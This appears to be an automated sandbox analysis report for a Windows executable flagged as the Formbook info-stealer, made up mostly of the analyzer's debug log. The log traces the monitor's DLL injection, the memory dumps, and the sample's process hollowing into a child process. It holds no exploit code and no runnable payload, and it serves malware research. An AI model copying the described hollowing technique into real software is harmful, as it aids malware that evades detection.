Detections

Yara:

Formbook

Auto Tasks

#17822: Unpacker

Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-30 13:54:16 2020-06-30 13:59:30 314 seconds Show Options Show Log
route = tor
2020-05-13 09:09:47,540 [root] INFO: Date set to: 20200630T13:47:48, timeout set to: 200
2020-06-30 13:47:48,078 [root] DEBUG: Starting analyzer from: C:\tmp2ylp3rhi
2020-06-30 13:47:48,078 [root] DEBUG: Storing results at: C:\YCyAWu
2020-06-30 13:47:48,078 [root] DEBUG: Pipe server name: \\.\PIPE\OVTzIXq
2020-06-30 13:47:48,078 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-06-30 13:47:48,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-30 13:47:48,078 [root] INFO: Automatically selected analysis package "exe"
2020-06-30 13:47:48,078 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-30 13:47:48,093 [root] DEBUG: Imported analysis package "exe".
2020-06-30 13:47:48,093 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-30 13:47:48,093 [root] DEBUG: Initialized analysis package "exe".
2020-06-30 13:47:48,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-30 13:47:48,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-30 13:47:48,203 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-30 13:47:48,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-30 13:47:48,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-30 13:47:48,265 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-30 13:47:48,265 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-30 13:47:48,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-30 13:47:48,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-30 13:47:48,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-30 13:47:48,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-30 13:47:48,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-30 13:47:48,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-30 13:47:48,312 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-30 13:47:48,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-30 13:47:50,265 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-30 13:47:50,281 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-30 13:47:50,343 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-30 13:47:50,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-30 13:47:50,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-30 13:47:50,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-30 13:47:50,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-30 13:47:50,390 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-30 13:47:50,390 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-30 13:47:50,390 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-30 13:47:50,390 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-30 13:47:50,390 [root] DEBUG: Started auxiliary module Browser
2020-06-30 13:47:50,390 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-30 13:47:50,390 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-30 13:47:50,390 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-30 13:47:50,406 [root] DEBUG: Started auxiliary module Curtain
2020-06-30 13:47:50,406 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-30 13:47:50,406 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-30 13:47:50,406 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-30 13:47:50,406 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-30 13:47:50,921 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-30 13:47:50,921 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-30 13:47:50,937 [root] DEBUG: Started auxiliary module DigiSig
2020-06-30 13:47:50,937 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-30 13:47:50,937 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-30 13:47:50,937 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-30 13:47:50,953 [root] DEBUG: Started auxiliary module Disguise
2020-06-30 13:47:50,953 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-30 13:47:50,953 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-30 13:47:50,953 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-30 13:47:50,953 [root] DEBUG: Started auxiliary module Human
2020-06-30 13:47:50,953 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Procmon
2020-06-30 13:47:50,968 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Screenshots
2020-06-30 13:47:50,968 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Sysmon
2020-06-30 13:47:50,968 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Usage
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-30 13:47:51,046 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe" with arguments "" with pid 4460
2020-06-30 13:47:51,046 [lib.api.process] INFO: Monitor config for process 4460: C:\tmp2ylp3rhi\dll\4460.ini
2020-06-30 13:47:51,046 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:47:51,140 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:47:51,140 [root] DEBUG: Loader: Injecting process 4460 (thread 5936) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:47:51,140 [root] DEBUG: Process image base: 0x00E10000
2020-06-30 13:47:51,140 [root] DEBUG: InjectDllViaIAT: Executable is .NET, injecting via queued APC.
2020-06-30 13:47:51,140 [root] DEBUG: InjectDllViaQueuedAPC: APC injection queued.
2020-06-30 13:47:51,140 [root] DEBUG: Successfully injected DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:47:51,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4460
2020-06-30 13:47:53,156 [lib.api.process] INFO: Successfully resumed process with pid 4460
2020-06-30 13:47:54,187 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:47:54,187 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:47:54,203 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4460 at 0x6ac70000, image base 0xe10000, stack from 0x315000-0x320000
2020-06-30 13:47:54,203 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe".
2020-06-30 13:47:54,203 [root] INFO: Loaded monitor into process with pid 4460
2020-06-30 13:47:54,218 [root] DEBUG: set_caller_info: Adding region at 0x00220000 to caller regions list (advapi32::RegQueryInfoKeyW).
2020-06-30 13:47:54,218 [root] DEBUG: set_caller_info: Adding region at 0x00830000 to caller regions list (ntdll::RtlDispatchException).
2020-06-30 13:47:54,249 [root] DEBUG: DLL loaded at 0x751E0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-30 13:47:54,249 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x830000
2020-06-30 13:47:54,249 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x00830000 size 0x400000.
2020-06-30 13:47:54,249 [root] DEBUG: DumpPEsInRange: Scanning range 0x830000 - 0x831000.
2020-06-30 13:47:54,265 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x830000-0x831000.
2020-06-30 13:47:54,296 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_69581700154472030262020 (size 0xffe)
2020-06-30 13:47:54,296 [root] DEBUG: DumpRegion: Dumped stack region from 0x00830000, size 0x1000.
2020-06-30 13:47:54,296 [root] DEBUG: set_caller_info: Failed to dumping calling PE image at 0x00220000.
2020-06-30 13:47:54,312 [root] DEBUG: set_caller_info: Adding region at 0x004F0000 to caller regions list (kernel32::FindFirstFileExW).
2020-06-30 13:47:54,421 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x5effff
2020-06-30 13:47:54,421 [root] DEBUG: DumpMemory: Nothing to dump at 0x004F0000!
2020-06-30 13:47:54,421 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x004F0000 size 0x100000.
2020-06-30 13:47:54,421 [root] DEBUG: DumpPEsInRange: Scanning range 0x4f0000 - 0x51d000.
2020-06-30 13:47:54,421 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4f0000-0x51d000.
2020-06-30 13:47:54,453 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_139228523454472030262020 (size 0x2cffe)
2020-06-30 13:47:54,453 [root] DEBUG: DumpRegion: Dumped stack region from 0x004F0000, size 0x2d000.
2020-06-30 13:47:54,468 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc4 amd local view 0x6B910000 to global list.
2020-06-30 13:47:54,468 [root] DEBUG: DLL loaded at 0x6B910000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7d000 bytes).
2020-06-30 13:47:54,468 [root] DEBUG: DLL unloaded from 0x76560000.
2020-06-30 13:47:54,484 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd4 amd local view 0x00100000 to global list.
2020-06-30 13:47:54,500 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd0 amd local view 0x00100000 to global list.
2020-06-30 13:47:54,500 [root] DEBUG: DLL loaded at 0x74760000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-30 13:47:54,515 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x0FE60000 for section view with handle 0xd4.
2020-06-30 13:47:54,531 [root] DEBUG: DLL loaded at 0x0FE60000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr (0x6ef000 bytes).
2020-06-30 13:47:54,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6E2C0000 for section view with handle 0xd4.
2020-06-30 13:47:54,531 [root] DEBUG: DLL loaded at 0x6E2C0000: C:\Windows\system32\MSVCR120_CLR0400 (0xf5000 bytes).
2020-06-30 13:47:54,546 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 4460, handle 0xf4.
2020-06-30 13:47:54,562 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf8 amd local view 0x00100000 to global list.
2020-06-30 13:47:54,562 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xfc amd local view 0x00110000 to global list.
2020-06-30 13:47:54,562 [root] INFO: Disabling sleep skipping.
2020-06-30 13:47:54,562 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4460.
2020-06-30 13:47:54,578 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4460.
2020-06-30 13:47:54,593 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4460.
2020-06-30 13:47:54,609 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x1e4 amd local view 0x05B80000 to global list.
2020-06-30 13:47:54,656 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x1f0 amd local view 0x65320000 to global list.
2020-06-30 13:47:54,656 [root] DEBUG: DLL loaded at 0x65320000: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\6715dc4d04e35f16d482900c355325e9\mscorlib.ni (0x1393000 bytes).
2020-06-30 13:47:54,687 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x204 amd local view 0x6ABF0000 to global list.
2020-06-30 13:47:54,687 [root] DEBUG: DLL loaded at 0x6ABF0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit (0x80000 bytes).
2020-06-30 13:47:54,687 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x200 amd local view 0x763D0000 to global list.
2020-06-30 13:47:54,687 [root] DEBUG: DLL loaded at 0x763D0000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-06-30 13:47:54,734 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x218 amd local view 0x68180000 to global list.
2020-06-30 13:47:54,750 [root] DEBUG: DLL loaded at 0x68180000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System\43822396682b0ffc3cfb66137ddab95f\System.ni (0xa10000 bytes).
2020-06-30 13:47:54,765 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x68EF0000 for section view with handle 0x218.
2020-06-30 13:47:54,765 [root] DEBUG: DLL loaded at 0x68EF0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\2c462a934e0586ac5e46c8b93e461384\System.Drawing.ni (0x194000 bytes).
2020-06-30 13:47:54,781 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x214 amd local view 0x64600000 to global list.
2020-06-30 13:47:54,781 [root] DEBUG: DLL loaded at 0x64600000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\aece3d371c0714e60f9509d2a3137395\System.Windows.Forms.ni (0xd1d000 bytes).
2020-06-30 13:47:54,843 [root] DEBUG: set_caller_info: Adding region at 0x001A0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-06-30 13:47:54,859 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x1affff
2020-06-30 13:47:54,859 [root] DEBUG: DumpMemory: Nothing to dump at 0x001A0000!
2020-06-30 13:47:54,859 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x001A0000 size 0x10000.
2020-06-30 13:47:54,859 [root] DEBUG: DumpPEsInRange: Scanning range 0x1a0000 - 0x1a1000.
2020-06-30 13:47:54,859 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1a0000-0x1a1000.
2020-06-30 13:47:54,890 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_38252076014482030262020 (size 0x52d)
2020-06-30 13:47:54,890 [root] DEBUG: DumpRegion: Dumped stack region from 0x001A0000, size 0x1000.
2020-06-30 13:47:54,906 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\uxtheme (0x40000 bytes).
2020-06-30 13:47:54,937 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x224 amd local view 0x67490000 to global list.
2020-06-30 13:47:55,125 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x22c amd local view 0x02A70000 to global list.
2020-06-30 13:47:55,249 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x001E0000 for section view with handle 0x22c.
2020-06-30 13:48:05,421 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x230 amd local view 0x73BE0000 to global list.
2020-06-30 13:48:05,453 [root] DEBUG: DLL loaded at 0x73BE0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\gdiplus (0x192000 bytes).
2020-06-30 13:48:05,468 [root] DEBUG: set_caller_info: Adding region at 0x00130000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-06-30 13:48:05,468 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x13ffff
2020-06-30 13:48:05,468 [root] DEBUG: DumpMemory: Nothing to dump at 0x00130000!
2020-06-30 13:48:05,484 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x00130000 size 0x10000.
2020-06-30 13:48:05,484 [root] DEBUG: DumpPEsInRange: Scanning range 0x130000 - 0x131000.
2020-06-30 13:48:05,484 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x130000-0x131000.
2020-06-30 13:48:05,515 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_148311835648482030262020 (size 0x14)
2020-06-30 13:48:05,515 [root] DEBUG: DLL loaded at 0x73480000: C:\Windows\system32\WindowsCodecs (0x131000 bytes).
2020-06-30 13:48:05,531 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x240 amd local view 0x00C30000 to global list.
2020-06-30 13:48:05,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x00C40000 for section view with handle 0x240.
2020-06-30 13:48:05,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x00C50000 for section view with handle 0x240.
2020-06-30 13:48:05,781 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x250 amd local view 0x63E20000 to global list.
2020-06-30 13:48:05,781 [root] DEBUG: DLL loaded at 0x63E20000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c8a2021e940773064c655a6ea6ee8cb2\System.Core.ni (0x7e0000 bytes).
2020-06-30 13:48:05,796 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x24c amd local view 0x67FA0000 to global list.
2020-06-30 13:48:05,859 [root] DEBUG: DLL loaded at 0x67FA0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\6090b158fd3d10686b422a455e188125\Microsoft.VisualBasic.ni (0x1d1000 bytes).
2020-06-30 13:48:05,921 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x248 amd local view 0x72900000 to global list.
2020-06-30 13:48:05,921 [root] DEBUG: DLL loaded at 0x72900000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting (0x13000 bytes).
2020-06-30 13:48:05,921 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x06240000 for section view with handle 0x248.
2020-06-30 13:48:05,953 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x244 amd local view 0x00DD0000 to global list.
2020-06-30 13:48:06,609 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,609 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,609 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,640 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,640 [root] DEBUG: Loader: Injecting process 4740 (thread 4708) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,640 [root] DEBUG: Process image base: 0x00E10000
2020-06-30 13:48:06,640 [root] DEBUG: InjectDllViaIAT: Executable is .NET, injecting via queued APC.
2020-06-30 13:48:06,656 [root] DEBUG: InjectDllViaQueuedAPC: APC injection queued.
2020-06-30 13:48:06,656 [root] DEBUG: Successfully injected DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,656 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
2020-06-30 13:48:06,656 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-06-30 13:48:06,687 [root] DEBUG: CreateProcessHandler: Injection info set for new process 4740, ImageBase: 0x00E10000
2020-06-30 13:48:06,703 [root] DEBUG: WriteMemoryHandler: Executable binary injected into process 4740 (ImageBase 0x400000)
2020-06-30 13:48:06,703 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2020-06-30 13:48:06,734 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0x27000.
2020-06-30 13:48:06,734 [root] DEBUG: WriteMemoryHandler: Dumped PE image from buffer at 0x4ac0108, SizeOfImage 0x27000.
2020-06-30 13:48:06,750 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,750 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,765 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,781 [root] DEBUG: Loader: Injecting process 4740 (thread 0) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,781 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:48:06,781 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:48:06,781 [root] DEBUG: Failed to inject DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,796 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,796 [root] DEBUG: WriteMemoryHandler: shellcode at 0x04AE7328 (size 0x26000) injected into process 4740.
2020-06-30 13:48:06,828 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_91607809649482030262020 (size 0x25efe)
2020-06-30 13:48:06,828 [root] DEBUG: WriteMemoryHandler: Dumped injected code/data from buffer.
2020-06-30 13:48:06,828 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,828 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,843 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,843 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,859 [root] DEBUG: Loader: Injecting process 4740 (thread 0) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,859 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:48:06,859 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:48:06,859 [root] DEBUG: Failed to inject DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,859 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,875 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,875 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,890 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,890 [root] DEBUG: Loader: Injecting process 4740 (thread 0) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,890 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:48:06,890 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:48:06,890 [root] DEBUG: Failed to inject DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,906 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,906 [root] DEBUG: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x0001C160 (process 4740).
2020-06-30 13:48:06,906 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,906 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,906 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,953 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,968 [root] DEBUG: Loader: Injecting process 4740 (thread 4708) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,968 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:48:06,968 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,984 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:48:06,984 [root] DEBUG: Successfully injected DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:07,015 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
2020-06-30 13:48:07,015 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4740.
2020-06-30 13:48:07,031 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:48:07,031 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:48:07,046 [root] INFO: Disabling sleep skipping.
2020-06-30 13:48:07,046 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:48:07,046 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4740 at 0x6ac70000, image base 0x400000, stack from 0x246000-0x250000
2020-06-30 13:48:07,046 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"{path}".
2020-06-30 13:48:07,062 [root] INFO: Loaded monitor into process with pid 4740
2020-06-30 13:48:07,062 [root] DEBUG: set_caller_info: Adding region at 0x00030000 to caller regions list (ntdll::LdrLoadDll).
2020-06-30 13:48:07,062 [root] DEBUG: set_caller_info: Adding region at 0x008F0000 to caller regions list (kernel32::GetSystemTime).
2020-06-30 13:48:07,062 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-30 13:48:07,078 [root] DEBUG: DLL loaded at 0x751E0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-30 13:48:07,078 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x8f0000
2020-06-30 13:48:07,078 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-30 13:48:07,078 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x008F0000 size 0x400000.
2020-06-30 13:48:07,078 [root] DEBUG: DumpPEsInRange: Scanning range 0x8f0000 - 0x8f1000.
2020-06-30 13:48:07,078 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x8f0000-0x8f1000.
2020-06-30 13:48:07,078 [root] DEBUG: DLL loaded at 0x75280000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-30 13:48:07,093 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4460
2020-06-30 13:48:07,093 [root] DEBUG: GetHookCallerBase: thread 5936 (handle 0x0), return address 0x001A21B9, allocation base 0x001A0000.
